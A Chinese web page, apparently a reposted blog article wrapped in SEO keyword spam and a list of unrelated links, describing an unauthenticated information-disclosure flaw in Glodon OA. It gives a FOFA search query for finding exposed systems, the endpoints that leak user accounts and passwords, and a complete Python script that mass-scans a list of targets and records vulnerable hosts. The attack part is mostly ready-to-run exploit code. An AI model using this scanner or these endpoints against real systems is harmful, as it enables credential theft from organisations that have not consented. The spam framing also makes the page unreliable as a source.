当前位置: 首页 > news >正文

wps免费模板网站山西省建设工程信息网站

wps免费模板网站,山西省建设工程信息网站,重庆五号线金建站,电子商务网站建设自服务器漏洞描述 广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑#xff0c;提供一百余款基于“端云大数据”产品/服务#xff0c;提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞#xff0c;由于某些接口没有鉴权#xff0c…漏洞描述 广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑提供一百余款基于“端云大数据”产品/服务提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞由于某些接口没有鉴权导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。 漏洞复现 FOFA appGlodon-企业管理产品 POC IP/Org/service/Service.asmx查看所有用户 /Org/service/Service.asmx/GetUserXml4GEPS 查看账户密码 /Org/service/Service.asmx/GetUserXml4GEPS 查看账户密码 python脚本 import argparse import time import requests from urllib.parse import urlsplit import warnings from urllib3.exceptions import InsecureRequestWarning color_red \033[91m color_green \033[92m color_blue \033[94m color_reset \033[0m def get_url(file): with open(file, r, encodingutf-8) as f: for url in f: url url.replace(\n, ) if http not in url: url http:// url parsed_url urlsplit(url) base_url parsed_url.scheme :// parsed_url.netloc send_req(base_url) def write_result(content): with open(result.txt, a, encodingUTF-8) as f: f.write({}\n.format(content)) warnings.filterwarnings(ignore, categoryInsecureRequestWarning) def send_req(url_check): url url_check /Org/service/Service.asmx/GetAllUsersXml header { User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36, Connection: close } try: response requests.get(urlurl, headersheader, verifyFalse, timeout3) if response.status_code 200 and ?xml in response.text and UserId in response.text and SUserId in response.text and Code in response.text: response requests.get(urlurl_check /Org/service/Service.asmx/GetUserXml4GEPS, headersheader, verifyFalse, timeout3) if response.status_code 200: result2 f{url_check}/Org/service/Service.asmx/GetUserXml4GEPS print(color_red result2 color_reset) # Added color_reset to avoid colored text issues write_result(result2) time.sleep(1) except Exception as e: pass if __name__ __main__: parser argparse.ArgumentParser() parser.add_argument(-f, --file, helpURL地址文件) args parser.parse_args() if args.file: get_url(args.file) else: print(使用-f加url文件地址) 执行效果
http://www.hkea.cn/news/14541232/

相关文章:

  • 网站建设的工作流程规划设计公司网站
  • 织梦婚纱网站模板凡客诚品失败的主要原因
  • 潍坊网站建设公司哪家好哈尔滨市住房和城乡建设局局网站
  • 谁有做任务网站wordpress 背景特效
  • 莱芜网站同城分类信息网站
  • 临桂建设局网站郑州做网站推广价格
  • 网站建设选哪个外贸网站建设要求
  • 手机网站建设推广软文营业执照 网站开发
  • 瑞安联科网站建设下载ps软件免费版2022
  • 在线培训网站怎么做wordpress分享文章插件
  • html5网站特点昆明网络营销
  • 做寂网站设计类专业电脑推荐
  • 外贸网站设计与推广wordpress顶部栏
  • 360做网站荆州西宁做网站的好公司
  • ps和dw怎么做网站室内设计主要是干什么的
  • 网站设计模板下载ps怎么制作网页效果图
  • 中国建设银行企业网站做招聘网站做服务器多少钱
  • 商城网站设计需要哪些技术广东省做网站推广公司
  • 成都网站建设哪家免费vps试用一年
  • 企业网站需要多大空间uc浏览器关键词排名优化
  • 建站快车品牌上海娱乐场所恢复营业最新通知
  • 个人如何制作一个网站wordpress 爬虫
  • 做网站美工工资多少钱简单的网站维护
  • 网站建设上qq图标去除网页设计制作课程表
  • 昆明seo公司网站看一个网站是用什么语言做的
  • 网站开发软件技术开发公司工程造价信息网官网登录入口
  • 重庆h5网站建设模板网站后台 js框架
  • 网页设计做军事网站的感想昆山推广用什么网站比较好
  • 做教育网站挣钱建筑网站带图解
  • 怎么在家做网站工业设计本科生作品集